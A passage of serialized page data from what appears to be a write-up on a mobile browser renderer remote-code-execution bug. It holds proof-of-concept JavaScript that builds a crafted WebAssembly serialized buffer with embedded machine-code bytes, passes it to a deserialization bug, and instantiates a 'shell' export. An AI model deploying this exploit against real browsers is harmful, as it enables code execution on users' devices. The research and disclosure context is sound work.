:139567},{"style":5601},[139568],{"type":32,"value":6430},{"type":26,"tag":137,"props":139570,"children":139571},{"class":5559,"line":5891},[139572,139576,139580,139584,139588,139592,139596,139600,139604],{"type":26,"tag":137,"props":139573,"children":139574},{"style":5573},[139575],{"type":32,"value":139169},{"type":26,"tag":137,"props":139577,"children":139578},{"style":5584},[139579],{"type":32,"value":82611},{"type":26,"tag":137,"props":139581,"children":139582},{"style":5590},[139583],{"type":32,"value":5593},{"type":26,"tag":137,"props":139585,"children":139586},{"style":5584},[139587],{"type":32,"value":136419},{"type":26,"tag":137,"props":139589,"children":139590},{"style":5601},[139591],{"type":32,"value":470},{"type":26,"tag":137,"props":139593,"children":139594},{"style":5584},[139595],{"type":32,"value":40482},{"type":26,"tag":137,"props":139597,"children":139598},{"style":5601},[139599],{"type":32,"value":470},{"type":26,"tag":137,"props":139601,"children":139602},{"style":5584},[139603],{"type":32,"value":136489},{"type":26,"tag":137,"props":139605,"children":139606},{"style":5601},[139607],{"type":32,"value":5604},{"type":26,"tag":137,"props":139609,"children":139610},{"class":5559,"line":5909},[139611],{"type":26,"tag":137,"props":139612,"children":139613},{"emptyLinePlaceholder":18},[139614],{"type":32,"value":6276},{"type":26,"tag":137,"props":139616,"children":139617},{"class":5559,"line":5930},[139618],{"type":26,"tag":137,"props":139619,"children":139620},{"style":5564},[139621],{"type":32,"value":139622},"  // %WasmTierUpFunction(func);\n",{"type":26,"tag":137,"props":139624,"children":139625},{"class":5559,"line":5939},[139626,139631,139635,139639,139643,139647,139651,139655,139659,139663,139667,139671,139675,139679],{"type":26,"tag":137,"props":139627,"children":139628},{"style":5610},[139629],{"type":32,"value":139630},"  for",{"type":26,"tag":137,"props":139632,"children":139633},{"style":5601},[139634],{"type":32,"value":4625},{"type":26,"tag":137,"props":139636,"children":139637},{"style":5573},[139638],{"type":32,"value":14378},{"type":26,"tag":137,"props":139640,"children":139641},{"style":5584},[139642],{"type":32,"value":5988},{"type":26,"tag":137,"props":139644,"children":139645},{"style":5590},[139646],{"type":32,"value":5593},{"type":26,"tag":137,"props":139648,"children":139649},{"style":5626},[139650],{"type":32,"value":5629},{"type":26,"tag":137,"props":139652,"children":139653},{"style":5601},[139654],{"type":32,"value":19820},{"type":26,"tag":137,"props":139656,"children":139657},{"style":5584},[139658],{"type":32,"value":506},{"type":26,"tag":137,"props":139660,"children":139661},{"style":5590},[139662],{"type":32,"value":11305},{"type":26,"tag":137,"props":139664,"children":139665},{"style":5626},[139666],{"type":32,"value":139091},{"type":26,"tag":137,"props":139668,"children":139669},{"style":5601},[139670],{"type":32,"value":19820},{"type":26,"tag":137,"props":139672,"children":139673},{"style":5584},[139674],{"type":32,"value":506},{"type":26,"tag":137,"props":139676,"children":139677},{"style":5590},[139678],{"type":32,"value":53872},{"type":26,"tag":137,"props":139680,"children":139681},{"style":5601},[139682],{"type":32,"value":17395},{"type":26,"tag":137,"props":139684,"children":139685},{"class":5559,"line":6191},[139686,139691],{"type":26,"tag":137,"props":139687,"children":139688},{"style":5682},[139689],{"type":32,"value":139690},"    func",{"type":26,"tag":137,"props":139692,"children":139693},{"style":5601},[139694],{"type":32,"value":6267},{"type":26,"tag":137,"props":139696,"children":139697},{"class":5559,"line":6208},[139698],{"type":26,"tag":137,"props":139699,"children":139700},{"style":5601},[139701],{"type":32,"value":8457},{"type":26,"tag":137,"props":139703,"children":139704},{"class":5559,"line":6225},[139705],{"type":26,"tag":137,"props":139706,"children":139707},{"emptyLinePlaceholder":18},[139708],{"type":32,"value":6276},{"type":26,"tag":137,"props":139710,"children":139711},{"class":5559,"line":6238},[139712,139716,139720,139724,139728,139732,139736],{"type":26,"tag":137,"props":139713,"children":139714},{"style":5573},[139715],{"type":32,"value":10440},{"type":26,"tag":137,"props":139717,"children":139718},{"style":5584},[139719],{"type":32,"value":138525},{"type":26,"tag":137,"props":139721,"children":139722},{"style":5590},[139723],{"type":32,"value":5593},{"type":26,"tag":137,"props":139725,"children":139726},{"style":5682},[139727],{"type":32,"value":138534},{"type":26,"tag":137,"props":139729,"children":139730},{"style":5601},[139731],{"type":32,"value":165},{"type":26,"tag":137,"props":139733,"children":139734},{"style":5584},[139735],{"type":32,"value":136449},{"type":26,"tag":137,"props":139737,"children":139738},{"style":5601},[139739],{"type":32,"value":6430},{"type":26,"tag":137,"props":139741,"children":139742},{"class":5559,"line":6247},[139743,139747,139751,139755,139759,139763,139767,139771,139775,139779],{"type":26,"tag":137,"props":139744,"children":139745},{"style":5584},[139746],{"type":32,"value":138570},{"type":26,"tag":137,"props":139748,"children":139749},{"style":5590},[139750],{"type":32,"value":5593},{"type":26,"tag":137,"props":139752,"children":139753},{"style":5601},[139754],{"type":32,"value":4625},{"type":26,"tag":137,"props":139756,"children":139757},{"style":5610},[139758],{"type":32,"value":35512},{"type":26,"tag":137,"props":139760,"children":139761},{"style":5584},[139762],{"type":32,"value":138525},{"type":26,"tag":137,"props":139764,"children":139765},{"style":5601},[139766],{"type":32,"value":470},{"type":26,"tag":137,"props":139768,"children":139769},{"style":5682},[139770],{"type":32,"value":60166},{"type":26,"tag":137,"props":139772,"children":139773},{"style":5601},[139774],{"type":32,"value":138599},{"type":26,"tag":137,"props":139776,"children":139777},{"style":5584},[139778],{"type":32,"value":41748},{"type":26,"tag":137,"props":139780,"children":139781},{"style":5601},[139782],{"type":32,"value":5604},{"type":26,"tag":137,"props":139784,"children":139785},{"class":5559,"line":6270},[139786,139790,139794,139798,139802,139806],{"type":26,"tag":137,"props":139787,"children":139788},{"style":5584},[139789],{"type":32,"value":104525},{"type":26,"tag":137,"props":139791,"children":139792},{"style":5601},[139793],{"type":32,"value":470},{"type":26,"tag":137,"props":139795,"children":139796},{"style":5682},[139797],{"type":32,"value":104534},{"type":26,"tag":137,"props":139799,"children":139800},{"style":5601},[139801],{"type":32,"value":165},{"type":26,"tag":137,"props":139803,"children":139804},{"style":5584},[139805],{"type":32,"value":11670},{"type":26,"tag":137,"props":139807,"children":139808},{"style":5601},[139809],{"type":32,"value":6430},{"type":26,"tag":137,"props":139811,"children":139812},{"class":5559,"line":6279},[139813],{"type":26,"tag":137,"props":139814,"children":139815},{"emptyLinePlaceholder":18},[139816],{"type":32,"value":6276},{"type":26,"tag":137,"props":139818,"children":139819},{"class":5559,"line":6288},[139820,139824,139829,139833,139837,139841,139845,139849],{"type":26,"tag":137,"props":139821,"children":139822},{"style":5573},[139823],{"type":32,"value":10440},{"type":26,"tag":137,"props":139825,"children":139826},{"style":5584},[139827],{"type":32,"value":139828}," result_bytes",{"type":26,"tag":137,"props":139830,"children":139831},{"style":5590},[139832],{"type":32,"value":5593},{"type":26,"tag":137,"props":139834,"children":139835},{"style":5573},[139836],{"type":32,"value":34528},{"type":26,"tag":137,"props":139838,"children":139839},{"style":5682},[139840],{"type":32,"value":136055},{"type":26,"tag":137,"props":139842,"children":139843},{"style":5601},[139844],{"type":32,"value":165},{"type":26,"tag":137,"props":139846,"children":139847},{"style":5584},[139848],{"type":32,"value":11670},{"type":26,"tag":137,"props":139850,"children":139851},{"style":5601},[139852],{"type":32,"value":6430},{"type":26,"tag":137,"props":139854,"children":139855},{"class":5559,"line":6355},[139856,139860,139864,139868,139872,139876,139880,139884,139888,139892,139896,139900,139904,139908,139912],{"type":26,"tag":137,"props":139857,"children":139858},{"style":5584},[139859],{"type":32,"value":104525},{"type":26,"tag":137,"props":139861,"children":139862},{"style":5601},[139863],{"type":32,"value":470},{"type":26,"tag":137,"props":139865,"children":139866},{"style":5682},[139867],{"type":32,"value":104534},{"type":26,"tag":137,"props":139869,"children":139870},{"style":5601},[139871],{"type":32,"value":165},{"type":26,"tag":137,"props":139873,"children":139874},{"style":6837},[139875],{"type":32,"value":136622},{"type":26,"tag":137,"props":139877,"children":139878},{"style":5590},[139879],{"type":32,"value":11491},{"type":26,"tag":137,"props":139881,"children":139882},{"style":5584},[139883],{"type":32,"value":139828},{"type":26,"tag":137,"props":139885,"children":139886},{"style":5601},[139887],{"type":32,"value":470},{"type":26,"tag":137,"props":139889,"children":139890},{"style":5682},[139891],{"type":32,"value":136639},{"type":26,"tag":137,"props":139893,"children":139894},{"style":5601},[139895],{"type":32,"value":165},{"type":26,"tag":137,"props":139897,"children":139898},{"style":6837},[139899],{"type":32,"value":136648},{"type":26,"tag":137,"props":139901,"children":139902},{"style":5601},[139903],{"type":32,"value":5671},{"type":26,"tag":137,"props":139905,"children":139906},{"style":5590},[139907],{"type":32,"value":356},{"type":26,"tag":137,"props":139909,"children":139910},{"style":6837},[139911],{"type":32,"value":136661},{"type":26,"tag":137,"props":139913,"children":139914},{"style":5601},[139915],{"type":32,"value":6430},{"type":26,"tag":137,"props":139917,"children":139918},{"class":5559,"line":6363},[139919],{"type":26,"tag":137,"props":139920,"children":139921},{"style":5601},[139922],{"type":32,"value":104566},{"type":26,"tag":35,"props":139924,"children":139925},{},[139926],{"type":32,"value":139927},"We get the serialized bytes:",{"type":26,"tag":35,"props":139929,"children":139930},{},[139931],{"type":26,"tag":2210,"props":139932,"children":139935},{"alt":139933,"src":139934},"image2","/posts/mobile-renderer-rce/image2.png",[],{"type":26,"tag":35,"props":139937,"children":139938},{},[139939,139941,139946],{"type":32,"value":139940},"We can now embed this output into the original bytecode that calls ",{"type":26,"tag":130,"props":139942,"children":139944},{"className":139943},[],[139945],{"type":32,"value":135518},{"type":32,"value":7072},{"type":26,"tag":5512,"props":139948,"children":139950},{"code":139949,"language":38211,"meta":7,"className":38209,"style":7},"(async () => {\n  const wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  const buffer = new Uint8Array([\n    146, 6, 222, 192, 174, 122, 171, 151, 31, 0, 0, 0, 39, 61, 60, 31, 0, 16, 3, 0, 0, 0, 0, 0, 64,\n    0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 56, 0, 0, 0, 44, 0, 0, 0, 56, 0, 0, 0, 56, 0,\n    0, 0, 56, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 95, 36, 3, 213, 16, 1, 128, 210, 127, 35, 3,\n    213, 231, 67, 190, 169, 253, 123, 1, 169, 253, 67, 0, 145, 191, 3, 0, 145, 253, 123, 193, 168,\n    255, 35, 3, 213, 192, 3, 95, 214, 31, 32, 3, 213, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 92, 50, 162, 0,\n  ]);\n  let r = bug(wasm_code, buffer.buffer);\n  result = (await r.next()).value;\n  console.log('DeserializeWasmModule result: ' + result);\n  const wasm_instance = new WebAssembly.Instance(result);\n  const f = wasm_instance.exports.shell;\n  console.log(f);\n})();\n",[139951],{"type":26,"tag":130,"props":139952,"children":139953},{"__ignoreMap":7},[139954,139977,140004,140223,140290,140297,140324,140535,140786,141037,141261,141443,141664,141742,141749,141796,141839,141875,141918,141957,141984],{"type":26,"tag":137,"props":139955,"children":139956},{"class":5559,"line":5560},[139957,139961,139965,139969,139973],{"type":26,"tag":137,"props":139958,"children":139959},{"style":5601},[139960],{"type":32,"value":165},{"type":26,"tag":137,"props":139962,"children":139963},{"style":5573},[139964],{"type":32,"value":38741},{"type":26,"tag":137,"props":139966,"children":139967},{"style":5601},[139968],{"type":32,"value":42293},{"type":26,"tag":137,"props":139970,"children":139971},{"style":5573},[139972],{"type":32,"value":17413},{"type":26,"tag":137,"props":139974,"children":139975},{"style":5601},[139976],{"type":32,"value":5875},{"type":26,"tag":137,"props":139978,"children":139979},{"class":5559,"line":5412},[139980,139984,139988,139992,139996,140000],{"type":26,"tag":137,"props":139981,"children":139982},{"style":5573},[139983],{"type":32,"value":38784},{"type":26,"tag":137,"props":139985,"children":139986},{"style":5584},[139987],{"type":32,"value":136042},{"type":26,"tag":137,"props":139989,"children":139990},{"style":5590},[139991],{"type":32,"value":5593},{"type":26,"tag":137,"props":139993,"children":139994},{"style":5573},[139995],{"type":32,"value":34528},{"type":26,"tag":137,"props":139997,"children":139998},{"style":5682},[139999],{"type":32,"value":136055},{"type":26,"tag":137,"props":140001,"children":140002},{"style":5601},[140003],{"type":32,"value":136060},{"type":26,"tag":137,"props":140005,"children":140006},{"class":5559,"line":5417},[140007,140011,140015,140019,140023,140027,140031,140035,140039,140043,140047,140051,140055,140059,140063,140067,140071,140075,140079,140083,140087,140091,140095,140099,140103,140107,140111,140115,140119,140123,140127,140131,140135,140139,140143,140147,140151,140155,140159,140163,140167,140171,140175,140179,140183,140187,140191,140195,140199,140203,140207,140211,140215,140219],{"type":26,"tag":137,"props":140008,"children":140009},{"style":5626},[140010],{"type":32,"value":136785},{"type":26,"tag":137,"props":140012,"children":140013},{"style":5601},[140014],{"type":32,"value":1108},{"type":26,"tag":137,"props":140016,"children":140017},{"style":5626},[140018],{"type":32,"value":136077},{"type":26,"tag":137,"props":140020,"children":140021},{"style":5601},[140022],{"type":32,"value":1108},{"type":26,"tag":137,"props":140024,"children":140025},{"style":5626},[140026],{"type":32,"value":136086},{"type":26,"tag":137,"props":140028,"children":140029},{"style":5601},[140030],{"type":32,"value":1108},{"type":26,"tag":137,"props":140032,"children":140033},{"style":5626},[140034],{"type":32,"value":136095},{"type":26,"tag":137,"props":140036,"children":140037},{"style":5601},[140038],{"type":32,"value":1108},{"type":26,"tag":137,"props":140040,"children":140041},{"style":5626},[140042],{"type":32,"value":878},{"type":26,"tag":137,"props":140044,"children":140045},{"style":5601},[140046],{"type":32,"value":1108},{"type":26,"tag":137,"props":140048,"children":140049},{"style":5626},[140050],{"type":32,"value":1817},{"type":26,"tag":137,"props":140052,"children":140053},{"style":5601},[140054],{"type":32,"value":1108},{"type":26,"tag":137,"props":140056,"children":140057},{"style":5626},[140058],{"type":32,"value":1817},{"type":26,"tag":137,"props":140060,"children":140061},{"style":5601},[140062],{"type":32,"value":1108},{"type":26,"tag":137,"props":140064,"children":140065},{"style":5626},[140066],{"type":32,"value":1817},{"type":26,"tag":137,"props":140068,"children":140069},{"style":5601},[140070],{"type":32,"value":1108},{"type":26,"tag":137,"props":140072,"children":140073},{"style":5626},[140074],{"type":32,"value":878},{"type":26,"tag":137,"props":140076,"children":140077},{"style":5601},[140078],{"type":32,"value":1108},{"type":26,"tag":137,"props":140080,"children":140081},{"style":5626},[140082],{"type":32,"value":3235},{"type":26,"tag":137,"props":140084,"children":140085},{"style":5601},[140086],{"type":32,"value":1108},{"type":26,"tag":137,"props":140088,"children":140089},{"style":5626},[140090],{"type":32,"value":878},{"type":26,"tag":137,"props":140092,"children":140093},{"style":5601},[140094],{"type":32,"value":1108},{"type":26,"tag":137,"props":140096,"children":140097},{"style":5626},[140098],{"type":32,"value":136160},{"type":26,"tag":137,"props":140100,"children":140101},{"style":5601},[140102],{"type":32,"value":1108},{"type":26,"tag":137,"props":140104,"children":140105},{"style":5626},[140106],{"type":32,"value":1817},{"type":26,"tag":137,"props":140108,"children":140109},{"style":5601},[140110],{"type":32,"value":1108},{"type":26,"tag":137,"props":140112,"children":140113},{"style":5626},[140114],{"type":32,"value":1817},{"type":26,"tag":137,"props":140116,"children":140117},{"style":5601},[140118],{"type":32,"value":1108},{"type":26,"tag":137,"props":140120,"children":140121},{"style":5626},[140122],{"type":32,"value":344},{"type":26,"tag":137,"props":140124,"children":140125},{"style":5601},[140126],{"type":32,"value":1108},{"type":26,"tag":137,"props":140128,"children":140129},{"style":5626},[140130],{"type":32,"value":277},{"type":26,"tag":137,"props":140132,"children":140133},{"style":5601},[140134],{"type":32,"value":1108},{"type":26,"tag":137,"props":140136,"children":140137},{"style":5626},[140138],{"type":32,"value":878},{"type":26,"tag":137,"props":140140,"children":140141},{"style":5601},[140142],{"type":32,"value":1108},{"type":26,"tag":137,"props":140144,"children":140145},{"style":5626},[140146],{"type":32,"value":1817},{"type":26,"tag":137,"props":140148,"children":140149},{"style":5601},[140150],{"type":32,"value":1108},{"type":26,"tag":137,"props":140152,"children":140153},{"style":5626},[140154],{"type":32,"value":375},{"type":26,"tag":137,"props":140156,"children":140157},{"style":5601},[140158],{"type":32,"value":1108},{"type":26,"tag":137,"props":140160,"children":140161},{"style":5626},[140162],{"type":32,"value":58487},{"type":26,"tag":137,"props":140164,"children":140165},{"style":5601},[140166],{"type":32,"value":1108},{"type":26,"tag":137,"props":140168,"children":140169},{"style":5626},[140170],{"type":32,"value":878},{"type":26,"tag":137,"props":140172,"children":140173},{"style":5601},[140174],{"type":32,"value":1108},{"type":26,"tag":137,"props":140176,"children":140177},{"style":5626},[140178],{"type":32,"value":20701},{"type":26,"tag":137,"props":140180,"children":140181},{"style":5601},[140182],{"type":32,"value":1108},{"type":26,"tag":137,"props":140184,"children":140185},{"style":5626},[140186],{"type":32,"value":136086},{"type":26,"tag":137,"props":140188,"children":140189},{"style":5601},[140190],{"type":32,"value":1108},{"type":26,"tag":137,"props":140192,"children":140193},{"style":5626},[140194],{"type":32,"value":136257},{"type":26,"tag":137,"props":140196,"children":140197},{"style":5601},[140198],{"type":32,"value":1108},{"type":26,"tag":137,"props":140200,"children":140201},{"style":5626},[140202],{"type":32,"value":136266},{"type":26,"tag":137,"props":140204,"children":140205},{"style":5601},[140206],{"type":32,"value":1108},{"type":26,"tag":137,"props":140208,"children":140209},{"style":5626},[140210],{"type":32,"value":136275},{"type":26,"tag":137,"props":140212,"children":140213},{"style":5601},[140214],{"type":32,"value":1108},{"type":26,"tag":137,"props":140216,"children":140217},{"style":5626},[140218],{"type":32,"value":136275},{"type":26,"tag":137,"props":140220,"children":140221},{"style":5601},[140222],{"type":32,"value":6099},{"type":26,"tag":137,"props":140224,"children":140225},{"class":5559,"line":5642},[140226,140230,140234,140238,140242,140246,140250,140254,140258,140262,140266,140270,140274,140278,140282,140286],{"type":26,"tag":137,"props":140227,"children":140228},{"style":5626},[140229],{"type":32,"value":136785},{"type":26,"tag":137,"props":140231,"children":140232},{"style":5601},[140233],{"type":32,"value":1108},{"type":26,"tag":137,"props":140235,"children":140236},{"style":5626},[140237],{"type":32,"value":1817},{"type":26,"tag":137,"props":140239,"children":140240},{"style":5601},[140241],{"type":32,"value":1108},{"type":26,"tag":137,"props":140243,"children":140244},{"style":5626},[140245],{"type":32,"value":91855},{"type":26,"tag":137,"props":140247,"children":140248},{"style":5601},[140249],{"type":32,"value":1108},{"type":26,"tag":137,"props":140251,"children":140252},{"style":5626},[140253],{"type":32,"value":3235},{"type":26,"tag":137,"props":140255,"children":140256},{"style":5601},[140257],{"type":32,"value":1108},{"type":26,"tag":137,"props":140259,"children":140260},{"style":5626},[140261],{"type":32,"value":878},{"type":26,"tag":137,"props":140263,"children":140264},{"style":5601},[140265],{"type":32,"value":1108},{"type":26,"tag":137,"props":140267,"children":140268},{"style":5626},[140269],{"type":32,"value":277},{"type":26,"tag":137,"props":140271,"children":140272},{"style":5601},[140273],{"type":32,"value":1108},{"type":26,"tag":137,"props":140275,"children":140276},{"style":5626},[140277],{"type":32,"value":1817},{"type":26,"tag":137,"props":140279,"children":140280},{"style":5601},[140281],{"type":32,"value":1108},{"type":26,"tag":137,"props":140283,"children":140284},{"style":5626},[140285],{"type":32,"value":136351},{"type":26,"tag":137,"props":140287,"children":140288},{"style":5601},[140289],{"type":32,"value":6099},{"type":26,"tag":137,"props":140291,"children":140292},{"class":5559,"line":5745},[140293],{"type":26,"tag":137,"props":140294,"children":140295},{"style":5601},[140296],{"type":32,"value":137072},{"type":26,"tag":137,"props":140298,"children":140299},{"class":5559,"line":5850},[140300,140304,140308,140312,140316,140320],{"type":26,"tag":137,"props":140301,"children":140302},{"style":5573},[140303],{"type":32,"value":38784},{"type":26,"tag":137,"props":140305,"children":140306},{"style":5584},[140307],{"type":32,"value":127818},{"type":26,"tag":137,"props":140309,"children":140310},{"style":5590},[140311],{"type":32,"value":5593},{"type":26,"tag":137,"props":140313,"children":140314},{"style":5573},[140315],{"type":32,"value":34528},{"type":26,"tag":137,"props":140317,"children":140318},{"style":5682},[140319],{"type":32,"value":136055},{"type":26,"tag":137,"props":140321,"children":140322},{"style":5601},[140323],{"type":32,"value":136060},{"type":26,"tag":137,"props":140325,"children":140326},{"class":5559,"line":5878},[140327,140332,140336,140340,140344,140348,140352,140356,140360,140365,140369,140374,140378,140383,140387,140392,140396,140400,140404,140408,140412,140416,140420,140424,140428,140433,140437,140442,140446,140451,140455,140459,140463,140467,140471,140475,140479,140483,140487,140491,140495,140499,140503,140507,140511,140515,140519,140523,140527,140531],{"type":26,"tag":137,"props":140328,"children":140329},{"style":5626},[140330],{"type":32,"value":140331},"    146",{"type":26,"tag":137,"props":140333,"children":140334},{"style":5601},[140335],{"type":32,"value":1108},{"type":26,"tag":137,"props":140337,"children":140338},{"style":5626},[140339],{"type":32,"value":21013},{"type":26,"tag":137,"props":140341,"children":140342},{"style":5601},[140343],{"type":32,"value":1108},{"type":26,"tag":137,"props":140345,"children":140346},{"style":5626},[140347],{"type":32,"value":137124},{"type":26,"tag":137,"props":140349,"children":140350},{"style":5601},[140351],{"type":32,"value":1108},{"type":26,"tag":137,"props":140353,"children":140354},{"style":5626},[140355],{"type":32,"value":137133},{"type":26,"tag":137,"props":140357,"children":140358},{"style":5601},[140359],{"type":32,"value":1108},{"type":26,"tag":137,"props":140361,"children":140362},{"style":5626},[140363],{"type":32,"value":140364},"174",{"type":26,"tag":137,"props":140366,"children":140367},{"style":5601},[140368],{"type":32,"value":1108},{"type":26,"tag":137,"props":140370,"children":140371},{"style":5626},[140372],{"type":32,"value":140373},"122",{"type":26,"tag":137,"props":140375,"children":140376},{"style":5601},[140377],{"type":32,"value":1108},{"type":26,"tag":137,"props":140379,"children":140380},{"style":5626},[140381],{"type":32,"value":140382},"171",{"type":26,"tag":137,"props":140384,"children":140385},{"style":5601},[140386],{"type":32,"value":1108},{"type":26,"tag":137,"props":140388,"children":140389},{"style":5626},[140390],{"type":32,"value":140391},"151",{"type":26,"tag":137,"props":140393,"children":140394},{"style":5601},[140395],{"type":32,"value":1108},{"type":26,"tag":137,"props":140397,"children":140398},{"style":5626},[140399],{"type":32,"value":99249},{"type":26,"tag":137,"props":140401,"children":140402},{"style":5601},[140403],{"type":32,"value":1108},{"type":26,"tag":137,"props":140405,"children":140406},{"style":5626},[140407],{"type":32,"value":1817},{"type":26,"tag":137,"props":140409,"children":140410},{"style":5601},[140411],{"type":32,"value":1108},{"type":26,"tag":137,"props":140413,"children":140414},{"style":5626},[140415],{"type":32,"value":1817},{"type":26,"tag":137,"props":140417,"children":140418},{"style":5601},[140419],{"type":32,"value":1108},{"type":26,"tag":137,"props":140421,"children":140422},{"style":5626},[140423],{"type":32,"value":1817},{"type":26,"tag":137,"props":140425,"children":140426},{"style":5601},[140427],{"type":32,"value":1108},{"type":26,"tag":137,"props":140429,"children":140430},{"style":5626},[140431],{"type":32,"value":140432},"39",{"type":26,"tag":137,"props":140434,"children":140435},{"style":5601},[140436],{"type":32,"value":1108},{"type":26,"tag":137,"props":140438,"children":140439},{"style":5626},[140440],{"type":32,"value":140441},"61",{"type":26,"tag":137,"props":140443,"children":140444},{"style":5601},[140445],{"type":32,"value":1108},{"type":26,"tag":137,"props":140447,"children":140448},{"style":5626},[140449],{"type":32,"value":140450},"60",{"type":26,"tag":137,"props":140452,"children":140453},{"style":5601},[140454],{"type":32,"value":1108},{"type":26,"tag":137,"props":140456,"children":140457},{"style":5626},[140458],{"type":32,"value":99249},{"type":26,"tag":137,"props":140460,"children":140461},{"style":5601},[140462],{"type":32,"value":1108},{"type":26,"tag":137,"props":140464,"children":140465},{"style":5626},[140466],{"type":32,"value":1817},{"type":26,"tag":137,"props":140468,"children":140469},{"style":5601},[140470],{"type":32,"value":1108},{"type":26,"tag":137,"props":140472,"children":140473},{"style":5626},[140474],{"type":32,"value":43444},{"type":26,"tag":137,"props":140476,"children":140477},{"style":5601},[140478],{"type":32,"value":1108},{"type":26,"tag":137,"props":140480,"children":140481},{"style":5626},[140482],{"type":32,"value":344},{"type":26,"tag":137,"props":140484,"children":140485},{"style":5601},[140486],{"type":32,"value":1108},{"type":26,"tag":137,"props":140488,"children":140489},{"style":5626},[140490],{"type":32,"value":1817},{"type":26,"tag":137,"props":140492,"children":140493},{"style":5601},[140494],{"type":32,"value":1108},{"type":26,"tag":137,"props":140496,"children":140497},{"style":5626},[140498],{"type":32,"value":1817},{"type":26,"tag":137,"props":140500,"children":140501},{"style":5601},[140502],{"type":32,"value":1108},{"type":26,"tag":137,"props":140504,"children":140505},{"style":5626},[140506],{"type":32,"value":1817},{"type":26,"tag":137,"props":140508,"children":140509},{"style":5601},[140510],{"type":32,"value":1108},{"type":26,"tag":137,"props":140512,"children":140513},{"style":5626},[140514],{"type":32,"value":1817},{"type":26,"tag":137,"props":140516,"children":140517},{"style":5601},[140518],{"type":32,"value":1108},{"type":26,"tag":137,"props":140520,"children":140521},{"style":5626},[140522],{"type":32,"value":1817},{"type":26,"tag":137,"props":140524,"children":140525},{"style":5601},[140526],{"type":32,"value":1108},{"type":26,"tag":137,"props":140528,"children":140529},{"style":5626},[140530],{"type":32,"value":3957},{"type":26,"tag":137,"props":140532,"children":140533},{"style":5601},[140534],{"type":32,"value":6099},{"type":26,"tag":137,"props":140536,"children":140537},{"class":5559,"line":5891},[140538,140542,140546,140550,140554,140558,140562,140566,140570,140574,140578,140582,140586,140590,140594,140598,140602,140606,140610,140614,140618,140622,140626,140630,140634,140638,140642,140646,140650,140654,140658,140662,140666,140670,140674,140678,140682,140686,140690,140694,140698,140702,140706,140710,140714,140718,140722,140726,140730,140734,140738,140742,140746,140750,140754,140758,140762,140766,140770,140774,140778,140782],{"type":26,"tag":137,"props":140539,"children":140540},{"style":5626},[140541],{"type":32,"value":136785},{"type":26,"tag":137,"props":140543,"children":140544},{"style":5601},[140545],{"type":32,"value":1108},{"type":26,"tag":137,"props":140547,"children":140548},{"style":5626},[140549],{"type":32,"value":1817},{"type":26,"tag":137,"props":140551,"children":140552},{"style":5601},[140553],{"type":32,"value":1108},{"type":26,"tag":137,"props":140555,"children":140556},{"style":5626},[140557],{"type":32,"value":1817},{"type":26,"tag":137,"props":140559,"children":140560},{"style":5601},[140561],{"type":32,"value":1108},{"type":26,"tag":137,"props":140563,"children":140564},{"style":5626},[140565],{"type":32,"value":1817},{"type":26,"tag":137,"props":140567,"children":140568},{"style":5601},[140569],{"type":32,"value":1108},{"type":26,"tag":137,"props":140571,"children":140572},{"style":5626},[140573],{"type":32,"value":1817},{"type":26,"tag":137,"props":140575,"children":140576},{"style":5601},[140577],{"type":32,"value":1108},{"type":26,"tag":137,"props":140579,"children":140580},{"style":5626},[140581],{"type":32,"value":1817},{"type":26,"tag":137,"props":140583,"children":140584},{"style":5601},[140585],{"type":32,"value":1108},{"type":26,"tag":137,"props":140587,"children":140588},{"style":5626},[140589],{"type":32,"value":1817},{"type":26,"tag":137,"props":140591,"children":140592},{"style":5601},[140593],{"type":32,"value":1108},{"type":26,"tag":137,"props":140595,"children":140596},{"style":5626},[140597],{"type":32,"value":878},{"type":26,"tag":137,"props":140599,"children":140600},{"style":5601},[140601],{"type":32,"value":1108},{"type":26,"tag":137,"props":140603,"children":140604},{"style":5626},[140605],{"type":32,"value":1817},{"type":26,"tag":137,"props":140607,"children":140608},{"style":5601},[140609],{"type":32,"value":1108},{"type":26,"tag":137,"props":140611,"children":140612},{"style":5626},[140613],{"type":32,"value":1817},{"type":26,"tag":137,"props":140615,"children":140616},{"style":5601},[140617],{"type":32,"value":1108},{"type":26,"tag":137,"props":140619,"children":140620},{"style":5626},[140621],{"type":32,"value":1817},{"type":26,"tag":137,"props":140623,"children":140624},{"style":5601},[140625],{"type":32,"value":1108},{"type":26,"tag":137,"props":140627,"children":140628},{"style":5626},[140629],{"type":32,"value":1817},{"type":26,"tag":137,"props":140631,"children":140632},{"style":5601},[140633],{"type":32,"value":1108},{"type":26,"tag":137,"props":140635,"children":140636},{"style":5626},[140637],{"type":32,"value":1817},{"type":26,"tag":137,"props":140639,"children":140640},{"style":5601},[140641],{"type":32,"value":1108},{"type":26,"tag":137,"props":140643,"children":140644},{"style":5626},[140645],{"type":32,"value":1817},{"type":26,"tag":137,"props":140647,"children":140648},{"style":5601},[140649],{"type":32,"value":1108},{"type":26,"tag":137,"props":140651,"children":140652},{"style":5626},[140653],{"type":32,"value":1817},{"type":26,"tag":137,"props":140655,"children":140656},{"style":5601},[140657],{"type":32,"value":1108},{"type":26,"tag":137,"props":140659,"children":140660},{"style":5626},[140661],{"type":32,"value":1817},{"type":26,"tag":137,"props":140663,"children":140664},{"style":5601},[140665],{"type":32,"value":1108},{"type":26,"tag":137,"props":140667,"children":140668},{"style":5626},[140669],{"type":32,"value":3235},{"type":26,"tag":137,"props":140671,"children":140672},{"style":5601},[140673],{"type":32,"value":1108},{"type":26,"tag":137,"props":140675,"children":140676},{"style":5626},[140677],{"type":32,"value":47727},{"type":26,"tag":137,"props":140679,"children":140680},{"style":5601},[140681],{"type":32,"value":1108},{"type":26,"tag":137,"props":140683,"children":140684},{"style":5626},[140685],{"type":32,"value":1817},{"type":26,"tag":137,"props":140687,"children":140688},{"style":5601},[140689],{"type":32,"value":1108},{"type":26,"tag":137,"props":140691,"children":140692},{"style":5626},[140693],{"type":32,"value":1817},{"type":26,"tag":137,"props":140695,"children":140696},{"style":5601},[140697],{"type":32,"value":1108},{"type":26,"tag":137,"pro